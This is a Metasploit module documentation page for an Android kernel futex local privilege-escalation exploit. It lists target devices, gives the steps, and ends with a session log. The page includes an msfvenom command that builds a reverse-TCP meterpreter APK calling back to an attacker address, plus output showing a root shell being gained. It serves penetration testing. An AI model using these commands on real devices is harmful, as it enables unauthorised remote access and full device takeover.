adam/metasploit-gs
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
Files
9beec65ef34c4e90a00a41ee1c8de0f9e6effd2a
metasploit-gs/documentation/modules/exploit/android/local/futex_requeue.md
T

101 lines
3.2 KiB
Markdown
Raw Normal View History

first upgrade on futex
2019-10-22 21:05:55 -04:00
## Vulnerable Application
This module exploits a Linux Kernel vulnerability, which is also available in the Android kernel, in a Linux subsystem call of `futex`.
It does not trip (set off) Samsung NOX as of the time of writing.
Failed exploitation attempts may reboot the device.
## Verification Steps
1. Start msfconsole
2. Get a shell on a vulnerable android device
3. Do: ```use exploit/android/local/futex_requeue```
4. Select an appropriate target
5. Do: ```set lhost [IP]```
6. Do: ```run```
7. You should get a root shell.
## Targets
**0 Automatic Targeting**
Attempt to automatically determine the target
**1 Default**
Nexus 4, 5, 7, etc
**2 New Samsung**
Samsung S3, S4, S5, etc
**3 Old Samsung**
Samsung Note 2, etc
**4 Samsung Grand**
Samsung Grand, etc
## Scenarios
### Samsung Galaxy S3 Verizon (SCH-I535 w/ android 4.4.2, kernel 3.4.0)
The following was used to generate a meterpreter Android application, and it was installed to the device.
```
msfvenom -p android/meterpreter_reverse_tcp LHOST=111.111.1.111 LPORT=9999 -o /var/www/html/android.apk
```
```
[*] Processing android.128.rb for ERB directives.
resource (android.128.rb)> use exploit/multi/handler
resource (android.128.rb)> set payload android/meterpreter_reverse_tcp
payload => android/meterpreter_reverse_tcp
resource (android.128.rb)> set lport 9999
lport => 9999
resource (android.128.rb)> set lhost 111.111.1.111
lhost => 111.111.1.111
resource (android.128.rb)> run
[*] Started reverse TCP handler on 111.111.1.111:9999
[*] Meterpreter session 1 opened (111.111.1.111:9999 -> 222.222.2.222:56975) at 2019-10-22 20:56:34 -0400
WARNING: Local file /root/metasploit-framework/data/meterpreter/ext_server_stdapi.jar is being used
WARNING: Local files may be incompatible with the Metasploit Framework
meterpreter > sysinfo
Computer : localhost
OS : Android 4.4.2 - Linux 3.4.0-1542239 (armv7l)
Meterpreter : dalvik/android
meterpreter > getuid
Server username: u0_a191
meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(multi/handler) > use exploit/android/local/futex_requeue
msf5 exploit(android/local/futex_requeue) > set session 1
session => 1
msf5 exploit(android/local/futex_requeue) > set verbose true
verbose => true
msf5 exploit(android/local/futex_requeue) > set lhost 111.111.1.111
lhost => 111.111.1.111
msf5 exploit(android/local/futex_requeue) > check
[+] Android version 4.4.2 appears to be vulnerable
[*] The target appears to be vulnerable.
msf5 exploit(android/local/futex_requeue) > run
[*] Started reverse TCP handler on 111.111.1.111:4444
[+] Android version 4.4.2 appears to be vulnerable
[*] Found device: d2vzw
[*] Fingerprint: Verizon/d2vzw/d2vzw:4.4.2/KOT49H/I535VRUDNE1:user/release-keys
[*] Using target: New Samsung
[*] Loading exploit library /data/data/com.metasploit.stage/files/thelr
[*] Loaded library /data/data/com.metasploit.stage/files/thelr, deleting
[*] Waiting 300 seconds for payload
[*] Transmitting intermediate stager...(136 bytes)
[*] Sending stage (904600 bytes) to 222.222.2.222
[*] Meterpreter session 2 opened (111.111.1.111:4444 -> 222.222.2.222:37502) at 2019-10-22 20:57:45 -0400
meterpreter > getuid
Server username: uid=0, gid=0, euid=0, egid=0
```
Reference in New Issue Copy Permalink